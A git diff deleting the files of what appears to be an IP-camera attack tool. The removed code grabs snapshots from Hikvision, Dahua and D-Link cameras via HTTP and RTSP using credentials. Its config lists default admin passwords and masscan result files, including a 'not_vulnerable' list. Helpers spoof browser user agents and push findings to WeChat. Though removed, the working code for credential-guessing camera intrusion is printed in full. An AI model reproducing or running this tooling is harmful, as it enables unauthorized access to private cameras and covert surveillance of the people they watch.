- url = f"http://{ip}:{port}/ISAPI/Streaming/channels/{ch}01/picture"
- file_name = os.path.join(snapshot_path, f"{ip}-{port}-channel{ch}-{user}-{passwd}.jpg")
- snapshot_by_url(url, file_name, auth=HTTPDigestAuth(user, passwd))
- # Dahua
- elif device.startswith('Dahua'):
- if '-' in device: channels = int(device.split('-')[1])
- else: channels = 1
- for ch in range(1, channels + 1):
- url = f"http://{ip}:{port}/cgi-bin/snapshot.cgi?channel={ch}"
- file_name = os.path.join(snapshot_path, f"{ip}-{port}-channel{ch}-{user}-{passwd}.jpg")
- snapshot_by_url(url, file_name, auth=HTTPDigestAuth(user, passwd))
- # DLink
- elif device == 'DLink':
- url = f"http://{ip}:{port}/dms?nowprofileid=1"
- snapshot_by_url(url, file_name, auth=(user, passwd))
-
-
-def snapshot_by_url(url, file_name, auth=None):
- for _ in range(MAX_RETRIES):
- try:
- headers = {'User-Agent': get_user_agent(), }
- if auth: r = requests.get(url, auth=auth, timeout=TIMEOUT, verify=False, headers=headers)
- else: r = requests.get(url, timeout=TIMEOUT, verify=False, headers=headers)
- if r.status_code == 200:
- with open(file_name, 'wb') as f: f.write(r.content)
- break
- except Exception as e:
- if DEBUG: printf(e, color='red', bold=True)
-
-
-# This one is not always work! Many bugs...
-def snapshot_by_rtsp(ip, port, user, passwd, sv_path, multiplay=False):
- """get snapshot through rtsp """
- try:
- if not multiplay: url = f"rtsp://{user}:{passwd}@{ip}:554"
- else: url = f"rtsp://{user}:{passwd}@{ip}:554/h264/ch0/main/av_stream"
- with rtsp.Client(rtsp_server_uri=url, verbose=False) as client:
- while client.isOpened():
- img_bgr = client.read(raw=True)
- if not img_bgr is None:
- img_rgb = img_bgr.copy()
- img_rgb[:,:,0] = img_bgr[:,:,2]
- img_rgb[:,:,1] = img_bgr[:,:,1]
- img_rgb[:,:,2] = img_bgr[:,:,0]
- name = f"{ip}-{port}-{user}-{passwd}.jpg"
- img = Image.fromarray(img_rgb)
- img.save(os.path.join(sv_path, name))
- break
- except Exception as e:
- if DEBUG: printf(e, color='red', bold=True)
-
-
-if __name__ == '__main__':
- args = get_parser()
- save_snapshot(args)
diff --git a/utils/config.py b/utils/config.py
deleted file mode 100644
index b8c32de..0000000
--- a/utils/config.py
+++ /dev/null
@@ -1,44 +0,0 @@
-"""configuration file"""
-
-#----------------------------
-# overall
-#----------------------------
-DEBUG = False
-TIMEOUT = 2
-
-
-#----------------------------
-# file names
-#----------------------------
-MASSCAN_TMP = 'masscan_tmp'
-MASSCAN_RESULTS = 'masscan_results'
-PAUSE = 'paused'
-RESULTS_ALL = 'results_all.csv'
-RESULTS_SIMPLE = 'results_simple.csv'
-RESULTS_FAILED = 'not_vulnerable.csv'
-
-
-#----------------------------
-# camera
-#----------------------------
-USERS = ['admin']
-PASSWORDS = ['admin', 'admin12345', 'asdf1234', 'abc12345', '12345admin', '12345abc']
-
-
-#----------------------------
-# snapshot
-#----------------------------
-MAX_RETRIES = 2
-
-
-#----------------------------
-# wechat
-#----------------------------
-# please refer to https://wxpusher.zjiecode.com/docs/#/
-UIDS = ['']
-TOKEN = ''
-
-
-#----------------------------
-# email (not supported yet...)
-#----------------------------
\ No newline at end of file
diff --git a/utils/net.py b/utils/net.py
deleted file mode 100644
index 6ef2212..0000000
--- a/utils/net.py
+++ /dev/null
@@ -1,62 +0,0 @@
-"""Network Tools"""
-import random
-
-import IPy
-
-
-def get_ip_segment(start: str, end: str) -> str:
- return IPy.IP(f"{start}-{end}", make_net=True).strNormal()
-
-
-def get_ip_seg_len(ip_seg: str) -> int:
- return IPy.IP(ip_seg, make_net=True).len()
-
-
-def get_all_ip(ip_seg: str) -> list:
- return [i.strNormal() for i in IPy.IP(ip_seg, make_net=True)]
-
-
-def get_user_agent(name='random'):
- user_agents = {'chrome': ["Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1",
- "Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
- "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
- "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
- "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1",
- "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
- "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5",
- "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
- "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
- "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
- "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
- "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
- "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
- "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
- "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3",
- "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24",
- "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24",],
- 'firefox': ["Mozilla/5.0 (Macintosh; U; Mac OS X Mach-O; en-US; rv:2.0a) Gecko/20040614 Firefox/3.0.0 ",
- "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3",
- "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5",
- "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.14) Gecko/20110218 AlexaToolbar/alxf-2.0 Firefox/3.6.14",
- "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"],
- 'opera': ["Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11",
- "Opera/9.80 (Android 2.3.4; Linux; Opera mobi/adr-1107051709; U; zh-cn) Presto/2.8.149 Version/11.10",],
- 'safari': ["Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
- "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8",
- "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5",],
- 'ie': ["Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0",
- "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)",
- "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
- "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"],}
- if name in user_agents:
- return random.choice(user_agents[name])
- return random.choice(random.choice(list(user_agents.values())))
-
-
-if __name__ == '__main__':
- # print(get_ip_segment('2.56.8.0', '2.56.9.255'))
- # print(get_all_ip('192.168.0.1/31'))
- # print(get_all_ip('2.56.8.0-2.56.9.255'))
- print(get_user_agent('random'))
\ No newline at end of file
diff --git a/utils/wechat.py b/utils/wechat.py
deleted file mode 100644
index 64c003f..0000000
--- a/utils/wechat.py
+++ /dev/null
@@ -1,18 +0,0 @@
-"""Wecheet Pusher"""
-import os
-import sys
-
-from wxpusher import WxPusher
-
-CWD = os.path.dirname(__file__)
-sys.path.append(os.path.join(CWD, '..'))
-from utils.config import UIDS, TOKEN
-
-
-def send_msg(content: str = "default content") -> dict:
- return WxPusher.send_message(uids=UIDS, token=TOKEN, content=f'{content}')
-
-
-if __name__ == '__main__':
- # just for testing
- print(send_msg())
-
- {% endfor %}
-
- {{ip}}
-
-
-